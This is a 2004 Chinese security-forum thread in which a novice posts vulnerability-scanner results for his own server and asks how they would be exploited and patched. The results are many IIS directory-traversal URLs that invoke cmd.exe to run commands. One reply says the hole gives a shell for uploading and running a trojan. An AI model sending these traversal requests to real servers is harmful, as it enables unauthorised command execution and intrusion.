20CN网络安全小组论坛 - 菜鸟乐园 - 我自己DIY的机器，扫描结果如下，请看

论坛: 菜鸟乐园标题: 我自己DIY的机器，扫描结果如下，请看

复制本贴地址

作者: somail [somail]

论坛用户

我是菜鸟请有高手帮忙，我的机器扫描出如下结果该怎么利用，最好是工具。又如何来把漏洞补上
扫描结果如下 http://192.*.*.158/?PageServices http://192.*.*158/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir%20c:\ http://192.*.*.158/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir http://192.*.*.158/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir%20c:\ http://192.*.*.158/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir http://192.*.*.158/cgi-bin/..?..?..?../winnt/system32/cmd.exe http://192.*.*.158/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir http://192.*.*.158/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir%20c:\ http://192.*.*.158/msadc/..?..?..?../winnt/system32/cmd.exe http://192.*.*.158/scripts/..?../winnt/system32/cmd.exe?/c+dir http://192.*.*.158/scripts/..?../winnt/system32/cmd.exe?/c+dir%20c:\ http://192.*.*.158/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir http://192.*.*.158/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir%20c:\
最近服务器硬盘老是闪，不知道是不是中木马了？
如果知道这些扫描结果一般是怎么利用的，用什么工具呢？
如果是你你第一步是要做什么我很想知道
毕竟自己的服务器，中木马了也要知道是怎么中的，谢谢

地主发表时间: 04-04-21 17:37

回复: louisor [louisor]

论坛用户

cgi漏洞，利用方法就是可以得到shell进一步上传木马，运行！

B1层发表时间: 04-04-21 20:11

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写：NetDemon

粤ICP备05087286号